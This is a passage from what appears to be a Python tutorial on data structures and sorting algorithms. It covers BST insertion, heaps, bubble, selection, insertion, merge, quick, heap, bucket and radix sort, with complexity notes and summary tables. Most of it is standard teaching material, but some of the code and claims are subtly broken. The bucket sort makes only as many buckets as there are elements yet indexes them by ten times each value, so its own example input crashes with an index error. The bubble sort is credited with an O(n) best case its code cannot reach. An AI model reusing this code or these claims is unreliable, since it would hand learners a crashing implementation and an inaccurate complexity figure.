        if key < root.value:
            root.left = insert(root.left, key)
        else:
            root.right = insert(root.right, key)
        return root

root = None
root = insert(root, 10)
root = insert(root, 20)

Complexity

  • Insertion/Search/Deletion: \(O(\log n)\) for balanced trees, \(O(n)\) for unbalanced trees.

Heaps

Heaps are specialized tree-based structures where the parent node is always greater (max-heap) or smaller (min-heap) than its children.

import heapq
heap = []
heapq.heappush(heap, 10)  # O(log n)
heapq.heappush(heap, 5)
print(heapq.heappop(heap))  # O(log n)

Complexity

  • Insertion/Deletion: \(O(\log n)\)
  • Peek: \(O(1)\)

Sorting Algorithms

Now we’ll talk about some very common sorting algorithms and understand their complexity to better equip ourselves to make choices about what types of searches we need to do and when.

Bubble Sort

Repeatedly swap adjacent elements if they are in the wrong order.

def bubble_sort(arr):
    for i in range(len(arr)):
        for j in range(0, len(arr) - i - 1):
            if arr[j] > arr[j + 1]:
                arr[j], arr[j + 1] = arr[j + 1], arr[j]

arr = [5, 2, 9, 1, 5, 6]
bubble_sort(arr)
print(arr)

Complexity

  • Best: \(O(n)\)
  • Average/Worst: \(O(n^2)\)
  • Space: \(O(1)\)

Selection Sort

Select the smallest element and swap it with the current element.

def selection_sort(arr):
    for i in range(len(arr)):
        min_idx = i
        for j in range(i + 1, len(arr)):
            if arr[j] < arr[min_idx]:
                min_idx = j
        arr[i], arr[min_idx] = arr[min_idx], arr[i]

arr = [64, 25, 12, 22, 11]
selection_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(n^2)\)
  • Space: \(O(1)\)

Insertion Sort

Insert each element into its correct position in the sorted portion of the array.

def insertion_sort(arr):
    for i in range(1, len(arr)):
        key = arr[i]
        j = i - 1
        while j >= 0 and key < arr[j]:
            arr[j + 1] = arr[j]
            j -= 1
        arr[j + 1] = key

arr = [12, 11, 13, 5, 6]
insertion_sort(arr)
print(arr)

Complexity

  • Best: \(O(n)\)
  • Average/Worst: \(O(n^2)\)
  • Space: \(O(1)\)

Merge Sort

Divide and conquer algorithm that splits the array and merges them back in sorted order.

def merge_sort(arr):
    if len(arr) > 1:
        mid = len(arr) // 2
        left = arr[:mid]
        right = arr[mid:]

        merge_sort(left)
        merge_sort(right)

        i = j = k = 0
        while i < len(left) and j < len(right):
            if left[i] < right[j]:
                arr[k] = left[i]
                i += 1
            else:
                arr[k] = right[j]
                j += 1
            k += 1

        while i < len(left):
            arr[k] = left[i]
            i += 1
            k += 1

        while j < len(right):
            arr[k] = right[j]
            j += 1
            k += 1

arr = [12, 11, 13, 5, 6, 7]
merge_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(n \log n)\)
  • Space: \(O(n)\)

Quick Sort

Picks a pivot and partitions the array around the pivot.

def partition(arr, low, high):
    pivot = arr[high]
    i = low - 1
    for j in range(low, high):
        if arr[j] <= pivot:
            i += 1
            arr[i], arr[j] = arr[j], arr[i]
    arr[i + 1], arr[high] = arr[high], arr[i + 1]
    return i + 1

def quick_sort(arr, low, high):
    if low < high:
        pi = partition(arr, low, high)
        quick_sort(arr, low, pi - 1)
        quick_sort(arr, pi + 1, high)

arr = [10, 7, 8, 9, 1, 5]
quick_sort(arr, 0, len(arr) - 1)
print(arr)

Complexity

  • Best/Average: \(O(n \log n)\)
  • Worst: \(O(n^2)\)
  • Space: \(O(\log n)\)

Heap Sort

Uses a heap data structure to find the maximum or minimum element.

def heapify(arr, n, i):
    largest = i
    l = 2 * i + 1
    r = 2 * i + 2

    if l < n and arr[l] > arr[largest]:
        largest = l

    if r < n and arr[r] > arr[largest]:
        largest = r

    if largest != i:
        arr[i], arr[largest] = arr[largest], arr[i]
        heapify(arr, n, largest)

def heap_sort(arr):
    n = len(arr)
    for i in range(n // 2 - 1, -1, -1):
        heapify(arr, n, i)
    for i in range(n - 1, 0, -1):
        arr[i], arr[0] = arr[0], arr[i]
        heapify(arr, i, 0)

arr = [12, 11, 13, 5, 6, 7]
heap_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(n \log n)\)
  • Space: \(O(1)\)

Bucket Sort

Distributes elements into buckets and sorts them individually.

def bucket_sort(arr):
    bucket = []
    for i in range(len(arr)):
        bucket.append([])

    for j in arr:
        index_b = int(10 * j)
        bucket[index_b].append(j)

    for i in range(len(arr)):
        bucket[i] = sorted(bucket[i])

    k = 0
    for i in range(len(arr)):
        for j in range(len(bucket[i])):
            arr[k] = bucket[i][j]
            k += 1

arr = [0.897, 0.565, 0.656, 0.1234, 0.665]
bucket_sort(arr)
print(arr)

Complexity

  • Best: \(O(n+k)\)
  • Average/Worst: \(O(n^2)\)
  • Space: \(O(n+k)\)

Radix Sort

Sorts numbers digit by digit starting from the least significant digit.

def counting_sort(arr, exp):
    n = len(arr)
    output = [0] * n
    count = [0] * 10

    for i in range(n):
        index = arr[i] // exp
        count[index % 10] += 1

    for i in range(1, 10):
        count[i] += count[i - 1]

    i = n - 1
    while i >= 0:
        index = arr[i] // exp
        output[count[index % 10] - 1] = arr[i]
        count[index % 10] -= 1
        i -= 1

    for i in range(len(arr)):
        arr[i] = output[i]

def radix_sort(arr):
    max_val = max(arr)
    exp = 1
    while max_val // exp > 0:
        counting_sort(arr, exp)
        exp *= 10

arr = [170, 45, 75, 90, 802, 24, 2, 66]
radix_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(nk)\)
  • Space: \(O(n+k)\)

Conclusion

We’ve explored a wide range of data structures and sorting algorithms, discussing their Python implementations, and breaking down their time and space complexities. These foundational concepts are essential for any software developer to understand, and mastering them will improve your ability to choose the right tools and algorithms for a given problem.

Below is a table outlining these complexities about the data structures:

Data Structure Access Time Search Time Insertion Time Deletion Time Space Complexity
List (Array) \(O(1)\) \(O(n)\) \(O(n)\) \(O(n)\) \(O(n)\)
Stack \(O(n)\) \(O(n)\) \(O(1)\) \(O(1)\) \(O(n)\)
Queue \(O(n)\) \(O(n)\) \(O(1)\) \(O(1)\) \(O(n)\)
Set N/A \(O(1)\) \(O(1)\) \(O(1)\) \(O(n)\)
Dictionary N/A \(O(1)\) \(O(1)\) \(O(1)\) \(O(n)\)
Binary Tree (BST) \(O(\log n)\) \(O(\log n)\) \(O(\log n)\) \(O(\log n)\) \(O(n)\)
Heap (Binary) \(O(n)\) \(O(n)\) \(O(\log n)\) \(O(\log n)\) \(O(n)\)

Below is a quick summary of the time complexities of the sorting algorithms we covered:

Algorithm Best Time Complexity Average Time Complexity Worst Time Complexity Auxiliary Space
Bubble Sort \(O(n)\) \(O(n^2)\) \(O(n^2)\) \(O(1)\)
Selection Sort \(O(n^2)\) \(O(n^2)\) \(O(n^2)\) \(O(1)\)
Insertion Sort \(O(n)\) \(O(n^2)\) \(O(n^2)\) \(O(1)\)
Merge Sort \(O(n \log n)\) \(O(n \log n)\) \(O(n \log n)\) \(O(n)\)
Quick Sort \(O(n \log n)\) \(O(n \log n)\) \(O(n^2)\) \(O(\log n)\)
Heap Sort \(O(n \log n)\) \(O(n \log n)\) \(O(n \log n)\) \(O(1)\)
Bucket Sort \(O(n + k)\) \(O(n + k)\) \(O(n^2)\) \(O(n + k)\)
Radix Sort \(O(nk)\) \(O(nk)\) \(O(nk)\) \(O(n + k)\)

Keep this table handy as a reference for making decisions on the appropriate sorting algorithm based on time and space constraints.

Happy coding!